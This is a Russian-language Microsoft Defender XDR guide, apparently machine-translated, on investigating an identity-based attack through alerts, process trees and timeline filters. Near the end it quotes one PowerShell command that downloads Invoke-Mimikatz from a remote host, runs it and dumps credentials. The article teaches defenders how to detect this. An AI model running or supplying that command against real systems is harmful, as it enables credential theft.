Поделиться через

Пример атаки на основе удостоверений

  • Статья

Область применения:

  • Microsoft Defender XDR

Microsoft Defender для удостоверений помогает обнаруживать вредоносные попытки компрометации удостоверений в организации. Так как Defender для удостоверений интегрируется с Microsoft Defender XDR, аналитики безопасности могут видеть угрозы, поступающие из Defender для удостоверений, такие как предполагаемые попытки повышения привилегий Netlogon.

Анализ атаки в Microsoft Defender для удостоверений

Microsoft Defender XDR позволяет аналитикам фильтровать оповещения по источнику обнаружения на вкладке Оповещения на странице инцидентов. В следующем примере источник обнаружения фильтруется в Defender для удостоверений.

Фильтрация источника обнаружения в Microsoft Defender для удостоверений

Если выбрать оповещение о предполагаемой атаке overpass-the-hash, вы перейдете на страницу в Microsoft Defender for Cloud Apps, где отображаются более подробные сведения. Вы всегда можете узнать больше об оповещении или атаке, выбрав Дополнительные сведения об этом типе оповещения , чтобы прочитать описание атаки и предложения по исправлению.

Оповещение о предполагаемой атаке путем перехода на хэш

Исследование той же атаки в Microsoft Defender для конечной точки

Кроме того, аналитик может использовать Defender для конечной точки, чтобы узнать больше о действиях в конечной точке. Выберите инцидент из очереди инцидентов, а затем перейдите на вкладку Оповещения . Здесь они также могут определить источник обнаружения. Источник обнаружения, помеченный как EDR, означает обнаружение и ответ конечной точки, который является Defender для конечной точки. Здесь аналитик выбирает оповещение, обнаруженное EDR.

Обнаружение и реагирование конечных точек на портале Microsoft Defender для конечной точки

На странице оповещения отображаются различные соответствующие сведения, такие как имя затронутого устройства, имя пользователя, состояние автоматического исследования и сведения об оповещении. В истории оповещений представлено визуальное представление дерева процессов. Дерево процессов представляет собой иерархическое представление родительских и дочерних процессов, связанных с оповещением.

Дерево процесса оповещений в Microsoft Defender для конечной точки

Каждый процесс можно развернуть для просмотра дополнительных сведений. Сведения, которые могут видеть аналитик, — это фактические команды, которые были введены в рамках вредоносного сценария, IP-адреса исходящих подключений и другие полезные сведения.

Сведения о процессе на портале Microsoft Defender для конечной точки

Выбрав Просмотреть в временная шкала, аналитик может еще больше детализировать, чтобы определить точное время компрометации.

Microsoft Defender для конечной точки может обнаруживать множество вредоносных файлов и скриптов. Однако из-за многих допустимых вариантов использования исходящих подключений, PowerShell и действий командной строки некоторые действия будут считаться безопасными, пока не создайте вредоносный файл или действие. Таким образом, использование временная шкала помогает аналитикам поместить оповещение в контекст с окружающим действием, чтобы определить исходный источник или время атаки, которая в противном случае скрыта обычной файловой системой и действиями пользователей.

Чтобы использовать временная шкала, аналитик начинается с обнаружения оповещений (красным цветом) и прокрутит вниз назад, чтобы определить, когда на самом деле началось исходное действие, которое привело к вредоносной активности.

Время начала обнаружения оповещений аналитика

Важно понимать и различать распространенные действия, такие как клиентский компонент Центра обновления Windows подключения, трафик активации доверенного программного обеспечения Windows, другие распространенные подключения к сайтам Майкрософт, сторонние действия в Интернете, действия конечной точки Майкрософт Configuration Manager и другие неопасные действия от подозрительных Деятельности. Одним из способов отличия является использование временная шкала фильтров. Существует множество фильтров, которые могут выделять определенные действия, отфильтровав все, что аналитик не хочет просматривать.

На рисунке ниже аналитик отфильтрован для просмотра только сетевых и технологических событий. Эти критерии фильтра позволяют аналитику видеть сетевые подключения и процессы, связанные с событием, в котором Блокнот установил подключение с IP-адресом, что мы также видели в дереве процессов.

Использование Блокнота для создания вредоносного исходящего подключения

В этом конкретном случае Блокнот использовался для создания вредоносного исходящего подключения. Однако часто злоумышленники используют iexplorer.exe для установки подключений для загрузки вредоносных полезных данных, так как обычно iexplorer.exe процессы считаются обычной активностью веб-браузера.

Еще одним элементом, который следует искать в временная шкала, будет использование PowerShell для исходящих подключений. Аналитик будет искать успешные подключения PowerShell с помощью таких команд, как IEX (New-Object Net.Webclient) исходящие подключения к веб-сайту, на котором размещен вредоносный файл.

В следующем примере PowerShell использовался для скачивания и выполнения Mimikatz с веб-сайта:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

Аналитик может быстро искать ключевые слова, введя ключевое слово в строке поиска, чтобы отобразить только события, созданные с помощью PowerShell.

Следующее действие

См. путь исследования фишинга .

См. также

Совет

Хотите узнать больше? Engage с сообществом Microsoft Security в нашем техническом сообществе: Microsoft Defender XDR Техническое сообщество.